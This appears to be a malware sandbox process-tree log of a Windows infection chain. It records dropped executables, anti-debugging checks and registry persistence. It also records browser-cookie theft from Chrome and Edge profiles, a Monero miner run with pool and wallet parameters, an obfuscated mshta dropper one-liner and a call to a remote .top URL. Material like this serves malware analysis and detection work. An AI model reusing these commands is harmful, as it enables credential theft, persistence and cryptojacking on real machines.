C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 10483⤵
- Program crash
PID:5356
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 13523⤵
- Program crash
PID:4864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 13643⤵
- Program crash
PID:5512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 14763⤵
- Program crash
PID:6164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 15963⤵
- Program crash
PID:1384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 17043⤵
- Program crash
PID:7732
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 9923⤵
- Program crash
PID:7768
-
-
-
C:\Users\Admin\Documents\AreuMkSthZVjdQsQv4v_hsUd.exe"C:\Users\Admin\Documents\AreuMkSthZVjdQsQv4v_hsUd.exe"2⤵
- Executes dropped EXE
PID:3840
-
-
C:\Users\Admin\Documents\vMrvfTC40fz0wJQSNnEb1vlj.exe"C:\Users\Admin\Documents\vMrvfTC40fz0wJQSNnEb1vlj.exe"2⤵
- Executes dropped EXE
PID:3972 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 3883⤵
- Program crash
PID:5812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 3683⤵
- Program crash
PID:6048
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 4043⤵
- Program crash
PID:2804
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 6243⤵
- Program crash
PID:5536
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 6603⤵
- Program crash
PID:4924
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 6963⤵
- Program crash
PID:4720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 7083⤵
- Program crash
PID:6836
-
-
-
C:\Users\Admin\Documents\L8_6iMKvWrCjH_BrTSZNnsZ8.exe"C:\Users\Admin\Documents\L8_6iMKvWrCjH_BrTSZNnsZ8.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:212
-
-
C:\Users\Admin\Documents\Y2SB33o6zbn4ANHc4ULNYw_s.exe"C:\Users\Admin\Documents\Y2SB33o6zbn4ANHc4ULNYw_s.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1832 -
C:\Users\Admin\Documents\Y2SB33o6zbn4ANHc4ULNYw_s.exeC:\Users\Admin\Documents\Y2SB33o6zbn4ANHc4ULNYw_s.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4832
-
-
-
C:\Users\Admin\Documents\A2AFe8yxnoM0pAQFO_osbdcb.exe"C:\Users\Admin\Documents\A2AFe8yxnoM0pAQFO_osbdcb.exe"2⤵
- Executes dropped EXE
PID:1672
-
-
C:\Users\Admin\Documents\PMYOcQY_sK9WgaNnRHrGhfrV.exe"C:\Users\Admin\Documents\PMYOcQY_sK9WgaNnRHrGhfrV.exe"2⤵
- Executes dropped EXE
PID:1948 -
C:\Users\Admin\Documents\PMYOcQY_sK9WgaNnRHrGhfrV.exe"C:\Users\Admin\Documents\PMYOcQY_sK9WgaNnRHrGhfrV.exe"3⤵PID:1296
-
-
-
C:\Users\Admin\Documents\APG9Y7QLV0Wv4wkaMpjWjH5O.exe"C:\Users\Admin\Documents\APG9Y7QLV0Wv4wkaMpjWjH5O.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3736
-
-
C:\Users\Admin\Documents\OUCxGDOmocchEqru9lIGqpec.exe"C:\Users\Admin\Documents\OUCxGDOmocchEqru9lIGqpec.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Users\Admin\Documents\DtfrI6pZuuWUoC6RfUcrXtwA.exe"C:\Users\Admin\Documents\DtfrI6pZuuWUoC6RfUcrXtwA.exe"2⤵
- Executes dropped EXE
PID:2720 -
C:\Users\Admin\Documents\DtfrI6pZuuWUoC6RfUcrXtwA.exe"C:\Users\Admin\Documents\DtfrI6pZuuWUoC6RfUcrXtwA.exe" -q3⤵
- Executes dropped EXE
PID:4920
-
-
-
C:\Users\Admin\Documents\Cd1_GhEkf6r5VyvSPccXa4pd.exe"C:\Users\Admin\Documents\Cd1_GhEkf6r5VyvSPccXa4pd.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2688 -
C:\Users\Admin\Documents\Cd1_GhEkf6r5VyvSPccXa4pd.exe"C:\Users\Admin\Documents\Cd1_GhEkf6r5VyvSPccXa4pd.exe"3⤵PID:5400
-
-
-
C:\Users\Admin\Documents\TsYrvSvl_8Fg7XvPJfjVRBqk.exe"C:\Users\Admin\Documents\TsYrvSvl_8Fg7XvPJfjVRBqk.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Users\Admin\Documents\8d_QkOtj1vJIPjPRfTvlMoul.exe"C:\Users\Admin\Documents\8d_QkOtj1vJIPjPRfTvlMoul.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Users\Admin\Documents\HBOyOhd25JvX0sqL7MBdiEtp.exe"C:\Users\Admin\Documents\HBOyOhd25JvX0sqL7MBdiEtp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2332 -
C:\Users\Admin\AppData\Roaming\8123329.exe"C:\Users\Admin\AppData\Roaming\8123329.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Users\Admin\AppData\Roaming\6623009.exe"C:\Users\Admin\AppData\Roaming\6623009.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4168 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:1820
-
-
-
C:\Users\Admin\AppData\Roaming\8464045.exe"C:\Users\Admin\AppData\Roaming\8464045.exe"3⤵
- Executes dropped EXE
PID:1612 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2808 -
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"5⤵PID:4868
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:2276
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"6⤵PID:4580
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:7204
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"6⤵PID:6544
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:1924
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"6⤵PID:7584
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:6116
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"6⤵PID:7204
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\1859954.exe"C:\Users\Admin\AppData\Roaming\1859954.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5100
-
-
-
C:\Users\Admin\Documents\jaMb6qv8jKSPzTumizrvUr0t.exe"C:\Users\Admin\Documents\jaMb6qv8jKSPzTumizrvUr0t.exe"2⤵
- Executes dropped EXE
PID:1952
-
-
C:\Users\Admin\Documents\QSjWABEot8afUaYKHNsOeMFK.exe"C:\Users\Admin\Documents\QSjWABEot8afUaYKHNsOeMFK.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3728 -
C:\Users\Admin\Documents\QSjWABEot8afUaYKHNsOeMFK.exeC:\Users\Admin\Documents\QSjWABEot8afUaYKHNsOeMFK.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4800
-
-
-
C:\Users\Admin\Documents\iKBIlyzjFEyxcJCFAThmZJNH.exe"C:\Users\Admin\Documents\iKBIlyzjFEyxcJCFAThmZJNH.exe"2⤵
- Executes dropped EXE
PID:3596 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 6603⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4652
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 6763⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 6803⤵
- Program crash
PID:4536
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 7003⤵
- Program crash
PID:5132
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 10763⤵
- Program crash
PID:6088
-
-
-
C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe"C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe"2⤵
- Executes dropped EXE
PID:3156 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )3⤵PID:4900
-
-
-
C:\Users\Admin\Documents\iOrJgzXZAN9GxViKD5epKQa9.exe"C:\Users\Admin\Documents\iOrJgzXZAN9GxViKD5epKQa9.exe"2⤵
- Executes dropped EXE
PID:2360 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 4803⤵
- Program crash
PID:5232
-
-
-
C:\Users\Admin\Documents\gXDSBbnv0dqtpT7VRWOBQ6Wx.exe"C:\Users\Admin\Documents\gXDSBbnv0dqtpT7VRWOBQ6Wx.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
C:\Users\Admin\Documents\nSQuLz6LMvwW604cz6Cc5udc.exe"C:\Users\Admin\Documents\nSQuLz6LMvwW604cz6Cc5udc.exe"2⤵PID:2808
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
PID:4932 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 29564⤵
- Program crash
PID:7528
-
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:4988 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5228
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7100
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:9244
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:10988
-
-
-
-
C:\Users\Admin\Documents\gEga2cgo4qNeMiHj3tT00poP.exe"C:\Users\Admin\Documents\gEga2cgo4qNeMiHj3tT00poP.exe"2⤵
- Executes dropped EXE
PID:2116 -
C:\Users\Admin\AppData\Local\Temp\is-OGD9A.tmp\gEga2cgo4qNeMiHj3tT00poP.tmp"C:\Users\Admin\AppData\Local\Temp\is-OGD9A.tmp\gEga2cgo4qNeMiHj3tT00poP.tmp" /SL5="$10290,138429,56832,C:\Users\Admin\Documents\gEga2cgo4qNeMiHj3tT00poP.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4428 -
C:\Users\Admin\AppData\Local\Temp\is-T9KB6.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-T9KB6.tmp\Setup.exe" /Verysilent4⤵PID:4420
-
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent5⤵PID:5424
-
C:\Users\Admin\AppData\Local\Temp\is-68ILR.tmp\Stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-68ILR.tmp\Stats.tmp" /SL5="$20378,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent6⤵PID:5608
-
C:\Users\Admin\AppData\Local\Temp\is-1H5D0.tmp\builder.exe"C:\Users\Admin\AppData\Local\Temp\is-1H5D0.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'7⤵PID:6048
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"5⤵PID:5452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 7606⤵
- Program crash
PID:3340
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 8166⤵
- Program crash
PID:6564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 8206⤵
- Program crash
PID:6764
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 7926⤵
- Program crash
PID:7160
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 9526⤵
- Program crash
PID:1420
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 13486⤵
- Program crash
PID:7476
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 12886⤵
- Program crash
PID:7644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 14126⤵
- Program crash
PID:3140
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 14446⤵
- Program crash
PID:3500
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵PID:5540
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579443 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:4848
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵PID:5584
-
C:\Users\Admin\AppData\Local\Temp\is-QKSJ6.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-QKSJ6.tmp\WEATHER Manager.tmp" /SL5="$103A6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵PID:5820
-
C:\Users\Admin\AppData\Local\Temp\is-2F9TM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2F9TM.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵PID:7840
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-2F9TM.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-2F9TM.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579443 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵PID:6668
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵PID:5496
-
C:\Users\Admin\AppData\Local\Temp\is-T8TBO.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-T8TBO.tmp\Inlog.tmp" /SL5="$1038C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵PID:5720
-
C:\Users\Admin\AppData\Local\Temp\is-R8VJK.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-R8VJK.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵PID:7512
-
C:\Users\Admin\AppData\Local\Temp\is-VUBFC.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-VUBFC.tmp\Setup.tmp" /SL5="$1058C,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-R8VJK.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵PID:7020
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-CO7ON.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵PID:8116
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-CO7ON.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵PID:5624
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵PID:4548
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵PID:5196
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-CO7ON.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-CO7ON.tmp\{app}\vdi_compiler"9⤵PID:9924
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-CO7ON.tmp\{app}\vdi_compiler.exe"10⤵PID:10408
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 411⤵
- Runs ping.exe
PID:10544
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵PID:9876
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵PID:9240
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵PID:5752
-
C:\Users\Admin\AppData\Roaming\5031872.exe"C:\Users\Admin\AppData\Roaming\5031872.exe"6⤵PID:1032
-
-
C:\Users\Admin\AppData\Roaming\1132653.exe"C:\Users\Admin\AppData\Roaming\1132653.exe"6⤵PID:4512
-
-
C:\Users\Admin\AppData\Roaming\5983282.exe"C:\Users\Admin\AppData\Roaming\5983282.exe"6⤵PID:4432
-
-
C:\Users\Admin\AppData\Roaming\1246016.exe"C:\Users\Admin\AppData\Roaming\1246016.exe"6⤵PID:6176
-
-
C:\Users\Admin\AppData\Roaming\3086426.exe"C:\Users\Admin\AppData\Roaming\3086426.exe"6⤵PID:6148
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵PID:5712
-
C:\Users\Admin\AppData\Local\Temp\is-M06I7.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-M06I7.tmp\VPN.tmp" /SL5="$10404,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵PID:5976
-
C:\Users\Admin\AppData\Local\Temp\is-2F9TL.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2F9TL.tmp\Setup.exe" /silent /subid=7207⤵PID:7380
-
C:\Users\Admin\AppData\Local\Temp\is-P9LAT.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-P9LAT.tmp\Setup.tmp" /SL5="$2044A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-2F9TL.tmp\Setup.exe" /silent /subid=7208⤵PID:7940
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵PID:4100
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵PID:7644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵PID:6460
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵PID:8236
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵PID:5984
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵PID:6820
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵PID:5872
-
C:\Users\Admin\Documents\45tPYmrHHJgRV2VOncrtg7bB.exe"C:\Users\Admin\Documents\45tPYmrHHJgRV2VOncrtg7bB.exe"6⤵PID:4156
-
-
C:\Users\Admin\Documents\4ykk_tOmhYYcofReEOtZ1lqo.exe"C:\Users\Admin\Documents\4ykk_tOmhYYcofReEOtZ1lqo.exe"6⤵PID:6244
-
-
C:\Users\Admin\Documents\Y442RnZgrFM_iDdEu1ut7gwO.exe"C:\Users\Admin\Documents\Y442RnZgrFM_iDdEu1ut7gwO.exe"6⤵PID:5212
-
-
C:\Users\Admin\Documents\Dh5d49ZSkd_VgOQBtOxD0Hae.exe"C:\Users\Admin\Documents\Dh5d49ZSkd_VgOQBtOxD0Hae.exe"6⤵PID:5964
-
C:\Users\Admin\Documents\Dh5d49ZSkd_VgOQBtOxD0Hae.exeC:\Users\Admin\Documents\Dh5d49ZSkd_VgOQBtOxD0Hae.exe7⤵PID:7932
-
-
-
C:\Users\Admin\Documents\wFKdQNuje6fe5kjsUID7vhk5.exe"C:\Users\Admin\Documents\wFKdQNuje6fe5kjsUID7vhk5.exe"6⤵PID:4312
-
-
C:\Users\Admin\Documents\HegPH4eY66ItZwuFMg35Ep2m.exe"C:\Users\Admin\Documents\HegPH4eY66ItZwuFMg35Ep2m.exe"6⤵PID:1776
-
-
C:\Users\Admin\Documents\dKdZXCC5vCwbNlV1774zbQy7.exe"C:\Users\Admin\Documents\dKdZXCC5vCwbNlV1774zbQy7.exe"6⤵PID:6360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 7967⤵
- Program crash
PID:5388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 8007⤵
- Program crash
PID:5204
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 8287⤵
- Program crash
PID:7036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 9567⤵
- Program crash
PID:8344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 9927⤵
- Program crash
PID:8584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 10487⤵
- Program crash
PID:8772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 13647⤵
- Program crash
PID:9072
-
-
-
C:\Users\Admin\Documents\7naThGR3BynDphNpBN5_zCsZ.exe"C:\Users\Admin\Documents\7naThGR3BynDphNpBN5_zCsZ.exe"6⤵PID:6628
-
-
C:\Users\Admin\Documents\VvFWMYPLK_bHHVUQcyXwTWSe.exe"C:\Users\Admin\Documents\VvFWMYPLK_bHHVUQcyXwTWSe.exe"6⤵PID:6720
-
-
C:\Users\Admin\Documents\W5wkZy3SIptdDx18JFxedDBJ.exe"C:\Users\Admin\Documents\W5wkZy3SIptdDx18JFxedDBJ.exe"6⤵PID:6164
-
-
C:\Users\Admin\Documents\tPTU_s7yPVUw7u8BWbuliAf0.exe"C:\Users\Admin\Documents\tPTU_s7yPVUw7u8BWbuliAf0.exe"6⤵PID:6508
-
-
